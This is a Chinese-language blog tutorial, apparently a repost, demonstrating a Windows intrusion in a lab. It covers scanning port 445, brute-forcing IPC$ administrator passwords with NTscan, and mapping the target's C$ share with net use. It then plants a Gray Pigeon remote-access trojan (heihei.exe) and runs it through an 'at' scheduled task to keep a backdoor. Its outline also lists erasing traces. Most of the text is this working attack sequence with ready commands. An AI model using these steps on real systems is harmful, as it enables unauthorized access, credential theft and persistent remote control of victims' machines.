簡單滲透測試流程演示(445端口、IPC$、灰鴿子)


目錄

一、實驗流程

二、實驗過程

  2.1 信息收集

  2.2 利用過程

  2.3 暴力破解系統密碼之445

  2.4 通過木馬留后門


一、實驗流程

0.授權(對方同意被滲透測試才是合法的。)
1.信息收集
  nslookup whois
2.掃描漏洞
  namp=ip范圍 端口 80(IIS,apache,什么網站)scanport
  高級掃描:如IIS漏洞2003——IIS6.0       2008——IIS7.0
            掃描網站漏洞(owasp top10)
3.漏洞利用

4.提權(shell環境、桌面環境、最高權限)
========
5.毀屍滅跡
6.留后門
7.滲透測試報告

手工測試端口號開放:
telnet IP地址 測試端口

1.scanport掃描445端口

2.漏洞利用之IPC$:
進行暴力破解:NTscan

3.
net use  \\10.1.1.2\ipc$ 密碼 /user:用戶
=====================================
net use f: \\10.1.1.2\share 密碼 /user:用戶
net use f: /del
net use * /del
net use f: \\10.1.1.2\c$ 密碼 /user:用戶
==========================================

4.制作木馬
利用光盤上的灰鴿子軟件

5.植入木馬(留后門)
copy d:\heihei.exe \\10.1.1.2\c$

6.設置計划任務自動執行木馬:
net time \\10.1.1.2
at \\10.1.1.2 11:11 "c:\heihei.exe"

7.等待肉雞上線

二、實驗過程

​win7想打server

2.1 信息收集

比如收集445端口的。掃描軟件很多,win平台以ScanPort為例。

還可以用telnet命令,不用掃描工具。

例如目前的目標機器10.1.1.1 的 445 端口開着,446 端口關閉。

用telnet分別手動探測這倆端口:

掃描技術就是為了確定攻擊目標。有了445就可以就IPC$漏洞


2.2 利用過程

net use f: \\10.1.1.1\share 123.abc /user:administrator

這句話是將對方的share路徑映射為本機的F盤。

在這個里面可以跟操作本地文件夾目錄一摸一樣。

怎么查看當前有哪幾條連接記錄呢?

如何刪除這條記錄呢》

想要攻擊服務器的445端口,對於命令

net use f: \\10.1.1.1\ipc$ 123.abc /user:administrator

只缺123.abc,即可以通過暴力破解進入對方的ipc$.

(安全建議:服務器管理員別叫Administrator,不建議用戶名跟公司名等有關系)

2.3 暴力破解系統密碼之445

NTscan其實就是不同的利用上述命令。

可以用真空密碼字典生成器制作字典

開始掃描 

有了密碼就可以為所欲為了、

net use \\10.1.1.1\ipc$ 123.abc /user:administrator

可以查看c盤下所有文件夾

2.4 通過木馬留后門

通過灰鴿子,配置服務程序就是制作木馬

運行一下藏在windows server的exe

替server做一個計算任務運行該程序:

查看server時間

可以看到目標機器已經上線。 可以干很多事。。。


免責聲明!

本站轉載的文章為個人學習借鑒使用,本站對版權不負任何法律責任。如果侵犯了您的隱私權益,請聯系本站郵箱yoyou2525@163.com刪除。



 
粵ICP備18138465號   © 2018-2025 CODEPRJ.COM